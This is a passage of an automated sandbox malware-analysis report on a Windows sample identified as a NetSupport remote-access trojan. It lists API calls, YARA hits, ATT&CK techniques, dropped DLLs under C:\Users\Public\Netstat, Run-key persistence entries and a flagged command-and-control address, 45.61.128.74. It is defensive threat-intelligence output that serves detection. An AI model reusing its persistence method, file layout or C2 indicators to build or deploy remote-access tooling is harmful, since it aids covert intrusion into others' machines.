                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,5_2_110F33F0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE1B0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1B0754
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,5_2_1103B160
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,8_2_11174AE9
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00007FF6FE194EB0 GetVersionExW,0_2_00007FF6FE194EB0
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,5_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,5_2_110D8200
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,8_2_11070090
                                Source: C:\Users\Public\Netstat\shv.exeCode function: 8_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,8_2_110D8200
                                Source: Yara matchFile source: 5.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.shv.exe.73af0000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.shv.exe.6e540000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.3.file.exe.1afa5756820.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.shv.exe.6cd70000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6336, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 3492, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 7008, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 6340, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: shv.exe PID: 3244, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\Public\Netstat\shv.exe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information1
                                Scripting                                		2
                                Valid Accounts                                		1
                                Windows Management Instrumentation                                		1
                                Scripting                                		1
                                Exploitation for Privilege Escalation                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Input Capture                                		2
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		1
                                Ingress Tool Transfer                                		Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		3
                                Obfuscated Files or Information                                		LSASS Memory1
                                Account Discovery                                		Remote Desktop Protocol1
                                Screen Capture                                		22
                                Encrypted Channel                                		Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Command and Scripting Interpreter                                		2
                                Valid Accounts                                		2
                                Valid Accounts                                		2
                                Software Packing                                		Security Account Manager2
                                File and Directory Discovery                                		SMB/Windows Admin Shares1
                                Input Capture                                		3
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution                                		1
                                Windows Service                                		21
                                Access Token Manipulation                                		1
                                DLL Side-Loading                                		NTDS44
                                System Information Discovery                                		Distributed Component Object Model3
                                Clipboard Data                                		4
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder                                		1
                                Windows Service                                		1
                                Masquerading                                		LSA Secrets141
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                                Process Injection                                		2
                                Valid Accounts                                		Cached Domain Credentials2
                                Virtualization/Sandbox Evasion                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                                Registry Run Keys / Startup Folder                                		1
                                Modify Registry                                		DCSync1
                                Process Discovery                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Virtualization/Sandbox Evasion                                		Proc Filesystem11
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                Access Token Manipulation                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                                Process Injection                                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562378 Sample: file.exe Startdate: 25/11/2024 Architecture: WINDOWS Score: 92 38 geo.netsupportsoftware.com 2->38 46 Suricata IDS alerts for network traffic 2->46 48 Multi AV Scanner detection for dropped file 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 4 other signatures 2->52 8 file.exe 1 17 2->8         started        11 shv.exe 2->11         started        13 shv.exe 2->13         started        15 shv.exe 2->15         started        signatures3 process4 file5 30 C:\Users\Public30etstat\shv.exe, PE32 8->30 dropped 32 C:\Users\Public32etstat\remcmdstub.exe, PE32 8->32 dropped 34 C:\Users\Public34etstat\pcicapi.dll, PE32 8->34 dropped 36 6 other files (3 malicious) 8->36 dropped 17 cmd.exe 1 8->17         started        process6 signatures7 44 Uses cmd line tools excessively to alter registry or file data 17->44 20 shv.exe 17 17->20         started        24 shv.exe 17->24         started        26 conhost.exe 17->26         started        28 4 other processes 17->28 process8 dnsIp9 40 45.61.128.74, 443, 49730 M247GB United States 20->40 42 geo.netsupportsoftware.com 104.26.1.231, 49731, 80 CLOUDFLARENETUS United States 20->42 54 Multi AV Scanner detection for dropped file 20->54 56 Contains functionalty to change the wallpaper 20->56 58 Delayed program exit found 20->58 signatures10

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                file.exe39%ReversingLabsWin64.Trojan.NetSupport

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\Public\Netstat\HTCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICHEK.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\PCICL32.DLL12%ReversingLabs
                                C:\Users\Public\Netstat\TCCTL32.DLL3%ReversingLabs
                                C:\Users\Public\Netstat\msvcr100.dll0%ReversingLabs
                                C:\Users\Public\Netstat\pcicapi.dll3%ReversingLabs
                                C:\Users\Public\Netstat\remcmdstub.exe13%ReversingLabs
                                C:\Users\Public\Netstat\shv.exe29%ReversingLabsWin32.Trojan.NetSupport

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://45.61.128.74/fakeurl.htm0%Avira URL Cloudsafe

                                Domains and IPs

                                Contacted Domains

                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                		104.26.1.231
                                		truefalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://45.61.128.74/fakeurl.htmtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.pci.co.uk/supportfile.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                      		high
                                      http://%s/testpage.htmwininet.dllfile.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                        		high
                                        http://geo.netsupportsoftware.com/location/loca.asp$shv.exe, 00000005.00000002.4131206311.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                            		high
                                            http://www.pci.co.uk/supportsupportfile.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                              		high
                                              http://www.symauth.com/rpa00file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                		high
                                                http://127.0.0.1RESUMEPRINTINGfile.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                  		high
                                                  http://%s/testpage.htmfile.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                    		high
                                                    http://geo.netsupportsoftware.com/location/loca.asp0shv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.netsupportschool.com/tutor-assistant.asp11(file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                        		high
                                                        http://geo.netsupportsoftware.com/Echoshv.exe, 00000005.00000002.4131206311.0000000000B90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://127.0.0.1shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                            		high
                                                            http://www.symauth.com/cps0(file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1673741447.000001AFA592D000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.drfalse
                                                              		high
                                                              http://www.netsupportschool.com/tutor-assistant.aspfile.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.drfalse
                                                                		high
                                                                http://%s/fakeurl.htmfile.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.drfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  104.26.1.231
                                                                  		geo.netsupportsoftware.comUnited States
                                                                  		13335CLOUDFLARENETUSfalse
                                                                  45.61.128.74
                                                                  		unknownUnited States
                                                                  		9009M247GBtrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1562378
                                                                  Start date and time:2024-11-25 14:57:09 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 11m 2s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:16
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:file.exe
                                                                  Detection:MAL
                                                                  Classification:mal92.rans.evad.winEXE@19/13@1/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 82%
                                                                  • Number of executed functions: 171
                                                                  • Number of non-executed functions: 102
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • VT rate limit hit for: file.exe

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  08:58:34API Interceptor17843064x Sleep call for process: shv.exe modified
                                                                  13:58:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
                                                                  13:58:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe
                                                                  13:58:23AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Netstat C:\Users\Public\Netstat\shv.exe

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  104.26.1.231Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  NeftPaymentError_Emdtd22102024_jpg.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  Update.jsGet hashmaliciousNetSupport RATBrowse
                                                                  • geo.netsupportsoftware.com/location/loca.asp
                                                                  45.61.128.74file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • http://45.61.128.74/fakeurl.htm
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • http://45.61.128.74/fakeurl.htm

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  geo.netsupportsoftware.comPyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.1.231
                                                                  Pyyidau.vbsGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.0.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
                                                                  • 104.26.0.231
                                                                  file.exeGet hashmaliciousNetSupport RATBrowse
